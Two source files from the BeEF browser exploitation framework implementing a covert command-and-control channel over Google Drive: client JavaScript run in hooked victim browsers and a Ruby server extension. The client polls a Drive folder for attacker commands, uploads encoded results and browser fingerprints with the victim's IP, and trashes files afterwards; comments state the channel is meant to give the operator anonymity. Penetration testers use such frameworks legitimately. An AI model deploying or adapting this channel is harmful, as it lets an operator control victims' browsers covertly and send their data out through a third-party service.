File: core/main/client/gdrive.js
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


/**
 * @Literal object: beef.gdrive
 *
 * Manage the Google Drive communication channel.
 * This channel is more esoteric but gives anonimity
 * if beef.http.gdrive.enable = true.
 */

beef.gdrive = {

    /**TODO: make macrosubstitutions instead values **/
    hook: "<%= @beef_hook %>", // TODO: delete
    //keychain file contains actual value of oauth key
    keychain_file_id: "",
    //command folder contains files with commands sent by framework
    cmd_folder_id: "",
    //apikey for keychain file
    api_key: "",
    //oauth2 auth key to modify files on the disk
    auth_key: "",
    auth_key_renew_interval: 60*60,

    /**TODO: form all api links into one dict **/
    //gdrive api link to get a file 
    api_file_url: "https://www.googleapis.com/drive/v2/files",
    //gdrive api link to upload a file 
    api_insert_url: "https://www.googleapis.com/upload/drive/v2/files",
    //some nice comment
    answers_folder_id: "",
    init_folder_id: "",



    /**
     * Init module and set timer to update authkey.
     * @return: {Integer} TODO
     */
    init: function () {
	beef.gdrive.lock = false;
        beef.gdrive.pull_auth_key();
        setInterval("beef.gdrive.pull_auth_key", beef.gdrive.auth_key_renew_interval);
    },

    /**
     * Pulls actual oauth key value from keychain file.
     * @return: {Integer} TODO
     */
    pull_auth_key: function () {
        var get_url = this.api_file_url + '/' + this.keychain_file_id +
            '?key=' + this.api_key + '&alt=media';
        $j.get(get_url, function (data) {
            beef.gdrive.auth_key = data;
        },'text')
    },


    /**
     * Write results to the "answers" directory
     * NOTE: Send Browser Fingerprinting results to the "init" directory
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
     * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
     * @param: {Function} callback: the function to call after execution
     */
    send_results: function (handler, cid, results, exec_status, callback) {
        if (beef.gdrive.auth_key == '') {
            setTimeout(function () {
                beef.gdrive.send_results(handler, cid, results, exec_status, callback);
            }, 1);
            return;
        }
    
        var folder_id = '';
        if (handler == '/init') {
            folder_id = beef.gdrive.init_folder_id;
        } else {
            folder_id = beef.gdrive.answers_folder_id;
        }

        var result_string = '{"handler" : "' + handler + '", "cid" :"' + cid +
                            '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                            '", "status": "' + exec_status +
                            '", "callback": "' + callback +
                            '","bh":"' + beef.session.get_hook_session_id() + '" }';
        
        // Core waiting for array of answers for all hadlers except /init
        if (handler != '/init') {
            result_string = '[' + result_string + ']';
        }

        beef.gdrive.upload_file(cid + 'ans', result_string, folder_id);
    },

    /**
     * Upload file to Google Drive
     * @param: {String} file_name: name of the file on the Google Drive
     * @param: {String} file_contents: content of the uploading file
     * @param: {String} parent_folder: folder in which the file will be stored
     */
    upload_file: function (file_name, file_contents, parent_folder) {
        const boundary = '-------answer';
        const delimiter = "\r\n--" + boundary + "\r\n";
        const close_delim = "\r\n--" + boundary + "--";
        var metadata = {
            'title': file_name,
            'parents': [{ id: parent_folder }],
            'mimeType': 'text/plain'
        };

        var base64Data = beef.encode.base64.encode(file_contents);
        var multipartRequestBody =
            delimiter +
            'Content-Type: application/json\r\n\r\n' +
            JSON.stringify(metadata) +
            delimiter +
            'Content-Type: text/plain\r\n' +
            'Content-Transfer-Encoding: base64\r\n' +
            '\r\n' +
            base64Data +
            close_delim;

        $j.ajax({
            type: 'POST',
            url: this.api_insert_url + '?uploadType=multipart',
            dataType: 'multipart/mixed; boundary="' + boundary + '"',
            data: multipartRequestBody,
            beforeSend: function (xhr) {
                xhr.setRequestHeader("Authorization", 'Bearer ' + beef.gdrive.auth_key);
                // great thanks to net.js developer
                xhr.setRequestHeader("Content-type", 'multipart/mixed; boundary="' + boundary + '"');
            },
        })
    },

    /**
     * Move a file to the trash.
     * @param: {String} file_id: id of the file on Google Drive
     */
    move_to_trash: function (file_id) {
        $j.ajax({
            type: 'POST',
            url: beef.gdrive.api_file_url + '/' + file_id + '/trash/',
            dataType: 'json',
            data: '',
            beforeSend: function (xhr) {
                xhr.setRequestHeader("Authorization", 'Bearer ' + beef.gdrive.auth_key);
            },
        })
        
    },

    /**
     * Pull file's content and move file to the trash.
     * @param: {String} file_id: file id in gdrive api
     * @param: {Function} file_callback: the function with file_id argument to call on succes 
     * @param: {Function} data_callback: the function with file data as argument to call on succes 
     */
    pull_file_content: function (file_id, file_callback, data_callback) {
        var get_url = beef.gdrive.api_file_url + '/' + file_id + '?alt=media';
        $j.ajax({
            type: 'GET',
            url: get_url,
            dataType: 'text',
            beforeSend: function (xhr) {
                xhr.setRequestHeader("Authorization", 'Bearer ' + beef.gdrive.auth_key);
            },
            success: function (data) {
                file_callback(file_id);
                data_callback(data);

            }
        })
    },

    /**
     * Get the command folder ID
     * It will be used to look up for commands sent by the framework
     */
    get_cmd_folder_id: function () {
        var get_url = beef.gdrive.api_file_url +
            '?q=title=%27' + beef.session.get_hook_session_id() + '%27' +
            '+and+mimeType=%27application/vnd.google-apps.folder%27' +
            '+and+trashed=false' +
            '&fields=items/id';
        
        $j.ajax({
            type: 'GET',
            url: get_url,
            dataType: 'json',
            beforeSend: function (xhr) {
                xhr.setRequestHeader("Authorization", 'Bearer ' + beef.gdrive.auth_key);
            },
            success: function (data) {
                if (data.items[0] && data.items[0].hasOwnProperty('id'))
                    beef.gdrive.cmd_folder_id = data.items[0]['id'];
            }
        });
    },

    /**
     * Get file ID's in the choosen directory
     * @param: {Function} callback: the function to call on every file ID
     */
    get_cmd_files_ids: function (callback) {
        if (beef.gdrive.cmd_folder_id == '' || beef.gdrive.lock) {
            beef.gdrive.get_cmd_folder_id();
            return;
        }

        var get_url = beef.gdrive.api_file_url +
            '?q=%27' + beef.gdrive.cmd_folder_id + '%27+in+parents' +
            '+and+trashed=false' +
            '&fields=items/id';

        $j.ajax({
            type: 'GET',
            url: get_url,
            dataType: 'json',
            beforeSend: function (xhr) {
                xhr.setRequestHeader("Authorization", 'Bearer ' + beef.gdrive.auth_key);
            },
            success: function (data) {
		beef.gdrive.lock = true;
                $j.each(data.items, function (index, value) {
                    callback(value['id']);
                })
            }
        });
    },

    /**
     * Pull new server commands
     * @param: {Function} callback: the function to call on every file ID (!)
     */
    pull_commands: function (callback) {
        if (beef.gdrive.auth_key == '')
            //not initialized yet 
            return;
        beef.gdrive.get_cmd_files_ids(function (id) {
            beef.gdrive.pull_file_content(id, beef.gdrive.move_to_trash, callback)
        })
    },

    /**
     * Get client IP using https://api.ipify.org
     * @param: {Function} callback: function that will be called on obtained IP
     */
    get_client_IP: function (callback) {
        $j.ajax({
            type: 'GET',
            url: 'https://api.ipify.org?format=text',
            dataType: 'text',
            success: function (ip) {
                callback(ip);
            }
        });
    },

    /**
     * Sends back browser details to framework, calling beef.browser.getDetails()
     */
    browser_details: function () {
        if (beef.gdrive.auth_key == '') {
            setTimeout("beef.gdrive.browser_details()", 1);
        } else {
            beef.gdrive.get_client_IP(function (ip) {
                var details = beef.browser.getDetails();
                details.IP = ip;
                beef.gdrive.send_results('/init', 0, beef.net.clean(details));
            })
            
        }
    }
};

beef.regCmp('beef.gdrive');

File: extensions/gdrive/gdrive.rb
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
  module Extension
    module Gdrive
      class Gdrive
        
        include Singleton
        require 'json'
        require 'base64'
        require 'net/http'

        include BeEF::Core::Handlers::Modules::Command
        MOUNTS = BeEF::Core::Server.instance.mounts

        def initialize
          @@config = BeEF::Core::Configuration.instance
          @@key_file_id      = ''
          @@init_folder_id   = ''
          @@answer_folder_id = ''
        end
        
        def start_command_server
            command_server = Thread.new{
                while true
                  sleep 5
                  hds = BeEF::Core::Models::HookedBrowser.all()
                  for hooked_browser in hds
                    hooked_browser.lastseen = Time.new.to_i
                    hooked_browser.count!
                    hooked_browser.save
                    zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id,
                                                                      :instructions_sent => false)
                    zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
                    #dhook
                    #xssrays
                  end
                end
            }
            command_server.abort_on_exception = true
            command_server.run
        end

        def start_data_server
          data_server = Thread.new{
            while true
              sleep 6
              data = check_answers
              next if data.nil?
              for i in data
                answers = JSON.parse i
                for answer in answers
                  command_results = Hash.new
                  command_results["data"] = Base64.decode64(answer["result"])
                  command_results["data"].force_encoding('UTF-8')
                  hooked_browser = answer["bh"]
                  handler = answer["handler"]
                  if handler.match(/command/)
                    BeEF::Core::Models::Command.save_result(hooked_browser, answer["cid"],
                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results,0)
                  else
                    answer["beefhook"] = hooked_browser
                    answer["results"] = JSON.parse(Base64.decode64(answer["result"]))
                    if MOUNTS.has_key?(handler)
                      if MOUNTS[handler].class == Array and MOUNTS[handler].length == 2
                        MOUNTS[handler][0].new(answer, MOUNTS[handler][1])
                      else
                        MOUNTS[handler].new(answer)
                      end
                    end
                  end
                end
              end
            end
          }
          data_server.abort_on_exception = true
          data_server.run
        end

        def start_init_server
          init_server = Thread.new{
            while true
              sleep 4
              ids = get_ids_folder @@init_folder_id
              for i in ids
                file = get_file i["id"]
                trash_file i["id"]
                next if file.nil?
                res = JSON.parse(file)
                res['results'] = JSON.parse( Base64.decode64(res['result']) )
                res['beefhook'] = res['bh']
                res['beefsession'] = nil
                BeEF::Extension::Gdrive::BrowserDetails.new( res )
              end
            end
          }
          init_server.abort_on_exception = true
          init_server.run
        end

        def start_token_updater
          updater = Thread.new {
            @@token = get_token
            upload_token @@token
            while true
              sleep(@@expires_token - 100)
              get_token
              upload_token @@token
            end
          }
          updater.abort_on_exception = true
          updater.run
        end

        def check_answers
          data = Array.new
          ids = get_ids_folder @@answer_folder_id
          for i in ids
            file = get_file i["id"]
            data.push( file )
            trash_file i["id"]
          end
          data
        end

        def upload_file title, file_data, path=nil
          uri = URI.parse("https://www.googleapis.com/upload/drive/v2/files?uploadType=multipart")
          http_post = Net::HTTP.new(uri.host, uri.port)
          http_post.use_ssl = true
          boundary = '-------answer'
          delimiter = "\r\n--" + boundary + "\r\n"
          close_delim = "\r\n--" + boundary + '--'
          base64Data = Base64.encode64(file_data) if not file_data.nil?
          multipartRequestBody =
              delimiter +
                  "Content-Type: application/json\r\n\r\n" +
                  '{"title" : "' + title.to_s + '",' +
                  "#{"\"parents\": [{ \"id\":\"#{path.to_s}\" }]," if not path.nil? }" +
                  '"mimeType": "text/plain"}' + delimiter +
                  "Content-Type: text/plain\r\n" +
                  "Content-Transfer-Encoding: base64\r\n" +
                  "\r\n" + base64Data + close_delim

          post_form = Net::HTTP::Post.new(uri.request_uri, initheader={'Authorization' => 'Bearer ' + @@token, 'Content-type' => 'multipart/mixed; boundary="'+boundary+'"'})
          post_form.body = multipartRequestBody
          http_post.request(post_form)
        end

        def trash_file file_id
          uri = URI.parse("https://www.googleapis.com/drive/v2/files/"+ file_id +"/trash")
          http_post = Net::HTTP.new(uri.host, uri.port)
          http_post.use_ssl = true
          post_form = Net::HTTP::Post.new(uri.request_uri, initheader={'Authorization' => 'Bearer ' + @@token})
          post_form.body = " "
          response = http_post.request(post_form)
          response.body
        end

        def get_ids_folder folder_id
          data = Hash.new
          data["q"] = '"'+folder_id+'" in parents and trashed=false'
          data["fields"] = "items/id"
          str = "#{URI.encode_www_form(data)}"
          uri = URI.parse("https://www.googleapis.com/drive/v2/files?"+str)
          http_get = Net::HTTP.new(uri.host, uri.port)
          http_get.use_ssl = true
          get_form = Net::HTTP::Get.new(uri.request_uri, initheader={'Authorization' => 'Bearer '+@@token})
          response = http_get.request(get_form)
          json = JSON.parse(response.body)
          json["items"]
        end

        def create_folder title
          require 'json'
          uri = URI.parse("https://www.googleapis.com/drive/v2/files")
          http_post = Net::HTTP.new(uri.host, uri.port)
          http_post.use_ssl = true
          post_form = Net::HTTP::Post.new(uri.request_uri, initheader={'Authorization' => 'Bearer ' + @@token, "Content-Type" => "application/json"})
          post_form.body = '{"title": "'+title +'", "mimeType": "application/vnd.google-apps.folder"}'
          response = http_post.request(post_form)
          json = JSON.parse(response.body)
          json['id']
        end

        def upload_command command, hook_session, command_id
          if BeEF::Core::Gdrive::Models::Custodian.first(:session => hook_session).nil?
            cmd = BeEF::Core::Gdrive::Models::Custodian.new(:session => hook_session,
                                                      :folder_name => create_folder(hook_session) )
            cmd.save
          end
          upload_file(command_id, command, 
                      BeEF::Core::Gdrive::Models::Custodian.first(:session => hook_session).folder_name )
        end

        def upload_token token
          uri = URI.parse("https://www.googleapis.com/upload/drive/v2/files/"+@@key_file_id)
          http_put = Net::HTTP.new(uri.host, uri.port)
          http_put.use_ssl = true
          put_form = Net::HTTP::Put.new(uri.request_uri, initheader={'Authorization' => 'Bearer ' + @@token})
          put_form.body = token
          response = http_put.request(put_form)
          response.body
        end

        def get_file file_id
          require 'json'
          uri = URI.parse("https://www.googleapis.com/drive/v2/files/"+file_id)
          http_get = Net::HTTP.new(uri.host, uri.port)
          http_get.use_ssl = true
          get_form = Net::HTTP::Get.new(uri.request_uri, initheader={'Authorization' => 'Bearer '+@@token})
          response = http_get.request(get_form)
          json = JSON.parse(response.body)
          uri = URI.parse(json["downloadUrl"])
          http_get = Net::HTTP.new(uri.host, uri.port)
          http_get.use_ssl = true
          get_form = Net::HTTP::Get.new(uri.request_uri, initheader={'Authorization' => 'Bearer '+@@token})
          response = http_get.request(get_form)
          response.body
        end

        def get_token
          client_id = ''
          refresh_token = ''
          client_secret = ''
          uri = URI.parse("https://accounts.google.com/o/oauth2/token")
          http_post = Net::HTTP.new(uri.host, uri.port)
          http_post.use_ssl = true

          data = {}
          data["refresh_token"] = refresh_token
          data["client_id"] = client_id
          data["client_secret"] = client_secret
          data["grant_type"] = "refresh_token"

          multipartRequestBody = "#{URI.encode_www_form(data)}"
          post_form = Net::HTTP::Post.new(uri.request_uri)
          post_form.body = multipartRequestBody
          response = http_post.request(post_form)
          json = JSON.parse(response.body)
          @@expires_token = json["expires_in"]
          json["access_token"]
        end
      end
    end
  end
end
